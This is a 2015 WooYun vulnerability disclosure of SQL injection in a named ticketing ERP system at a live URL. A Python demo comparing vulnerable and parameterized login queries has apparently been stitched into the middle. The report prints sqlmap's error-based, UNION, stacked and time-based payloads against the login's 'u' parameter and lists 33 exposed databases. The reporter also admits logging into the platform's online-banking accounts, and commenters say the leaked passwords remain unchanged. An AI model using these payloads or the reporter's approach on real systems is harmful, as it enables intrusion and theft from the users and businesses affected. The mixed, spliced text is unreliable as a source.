
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0100495

Title: SQL injection in a third-party ticketing system (leaks flight and train ticket users' phone numbers and order information, the platform's online-banking account passwords for each bank and its Alipay credentials, and also allows bulk SMS sending)

Related vendor: CNCERT (National Computer Network Emergency Response Technical Team)

Author: YY-2012

Submitted: 2015-03-10 14:57

Fix deadline: 2015-04-24 14:58

Public disclosure: 2015-04-24 14:58

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Handed over to a third-party partner organisation (CNCERT) for handling

Source: http://www.wooyun.org; for questions or assistance contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2015-03-10: Details sent to the vendor; awaiting vendor handling
2015-03-15: Vendor has confirmed; details visible to the vendor only
2015-03-18: Details opened to third-party security partners
2015-05-09: Details opened to core white hats and experts in the relevant field
2015-05-19: Details opened to regular white hats
2015-05-29: Details opened to intern white hats
2015-04-24: Details opened to the public

Brief description:

I only logged into your online banking and did nothing else; if you don't believe me there is nothing I can do about it..

Detailed description:

PiaoYou (票友) ERP management system
http://jy.4000211929.com/
The login form has a POST-based SQL injection; I logged in with a "universal password" (an authentication-bypass string)..
Once inside, I found that every online-banking account could be logged into..
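The root cause described above is a login query built by string concatenation, so that the username field becomes part of the SQL text. The following is an added example, not the PiaoYou system's code nor the reporter's: a minimal login check against an in-memory SQLite table with constructed sample users, showing the concatenated query beside its parameterized replacement. The table and column names are assumptions; the bypass input mirrors the `u=admin' ...--` shape visible in the report's sqlmap output.

```python
import hashlib
import sqlite3


def _pw_hash(password: str) -> str:
    """Stand-in password hash (SHA-256, unsalted, demo only)."""
    return hashlib.sha256(password.encode("utf-8")).hexdigest()


def make_db() -> sqlite3.Connection:
    """Constructed sample data: a tiny users table like a ticketing ERP might keep."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, pw_hash TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, pw_hash) VALUES (?, ?)",
        [("admin", _pw_hash("correct horse")), ("clerk", _pw_hash("battery staple"))],
    )
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """The defective pattern: the username is spliced into the SQL string.

    Hashing the password does not help; the injection point is the username,
    and a quote plus a comment marker truncates the WHERE clause so the
    password comparison is never evaluated.
    """
    sql = (
        "SELECT id FROM users WHERE username = '" + username
        + "' AND pw_hash = '" + _pw_hash(password) + "'"
    )
    return conn.execute(sql).fetchone() is not None


def login_fixed(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """The corrected pattern: placeholders, so user input is only ever data."""
    sql = "SELECT id FROM users WHERE username = ? AND pw_hash = ?"
    return conn.execute(sql, (username, _pw_hash(password))).fetchone() is not None


def demo() -> dict:
    """Run the same bypass-shaped input through both versions for comparison."""
    conn = make_db()
    bypass_user = "admin'--"  # constructed: quote closes the literal, -- comments out the rest
    return {
        "vuln_bypass": login_vulnerable(conn, bypass_user, "anything"),
        "fixed_bypass": login_fixed(conn, bypass_user, "anything"),
        "fixed_good": login_fixed(conn, "admin", "correct horse"),
        "fixed_bad_pw": login_fixed(conn, "admin", "wrong"),
    }


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name}: {'login granted' if ok else 'login denied'}")
```

The parameterized version treats `admin'--` as a literal username that matches no row, so the bypass fails regardless of the password value; on SQL Server the same fix is a parameterized `SqlCommand`, and the stacked `WAITFOR DELAY` and UNION payloads in the sqlmap output are closed off by the same change.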

Proof of vulnerability:

[screenshots: qqqqq1111111111111.jpg, qqqqqq222222222.jpg, qqqqqqqqqq3333333333.jpg, qqqqqqqq5555555.jpg, qqqqqqqqqqqq4444444444.jpg]


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: u (POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: u=admin' AND 9063=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(118)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (9063=9063) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(120)+CHAR(120)+CHAR(113))) AND 'elof'='elof&p=admin&y=0489
Type: UNION query
Title: Generic UNION query (NULL) - 9 columns
Payload: u=-9011' UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(113)+CHAR(112)+CHAR(118)+CHAR(106)+CHAR(113)+CHAR(102)+CHAR(98)+CHAR(117)+CHAR(107)+CHAR(100)+CHAR(85)+CHAR(71)+CHAR(72)+CHAR(77)+CHAR(121)+CHAR(113)+CHAR(113)+CHAR(120)+CHAR(120)+CHAR(113),NULL,NULL,NULL,NULL-- &p=admin&y=0489
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: u=admin'; WAITFOR DELAY '0:0:5'--&p=admin&y=0489
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: u=admin' WAITFOR DELAY '0:0:5'--&p=admin&y=0489
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
available databases [33]:
[*] 85233898
[*] aiyang_pvg
[*] aiyang_web
[*] byclq_sha
[*] cht_travel
[*] cht_web
[*] czair_szx
[*] hangyue_sha
[*] jieyou_sha
[*] jtkj_pek
[*] kuaiqu_sha
[*] lingxian_xiy
[*] lvtui_dlc
[*] master
[*] model
[*] msdb
[*] oa_users
[*] pek_hsdair
[*] PiaoYou_lesirui
[*] PiaoYou_shanixin
[*] qiancheng_sha
[*] qqhorse_sha
[*] regcompany
[*] saibo_kmg
[*] shuoxing_szx
[*] silu_bjs
[*] tempdb
[*] tscy_szx
[*] wanghai_hak
[*] wine_sha_lv
[*] xincheng
[*] yps_can
[*] zgppt


[screenshot: qqqqqqqqqqq66666666.jpg]

Fix recommendation:

You know what to do..

Copyright notice: please credit the source when reposting: YY-2012@WooYun


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 9

Confirmed: 2015-03-15 11:17

Vendor reply:

CNVD has confirmed and reproduced the described issue and has notified the website's operating unit (the software vendor) through the contact details published on the website (or a previously established handling channel).

Latest status:

None yet


Vulnerability rating:

Comments

  1. 2015-03-10 15:48 | 疯狗 Certified white hat ( Intern white hat | Rank:44 Vulnerabilities:2 | Having seen every vulnerability under heaven, nothing is left hidden in my heart.)

    Even the online-banking credentials were leaked

  2. 2015-04-24 15:54 | 圣路西法 ( Passer-by | Rank:4 Vulnerabilities:3 | watching the masters ส็็็็็็ ̷̸̨̀͒̏̃ͦ...)

    I only logged into your online banking and did nothing else; if you don't believe me there is nothing I can do about it..

  3. 2015-04-26 02:40 | black hook ( Passer-by | Rank:28 Vulnerabilities:8 | Newcomer, )

    @疯狗 It looks like the passwords still haven't been changed.. could you blur them?